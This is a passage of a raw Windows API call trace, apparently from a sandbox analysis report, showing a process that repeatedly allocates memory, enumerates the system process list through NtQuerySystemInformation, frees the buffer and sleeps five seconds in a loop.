returned 0x0 [0218.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.442] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.463] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.532] NtQuerySystemInformation (in: 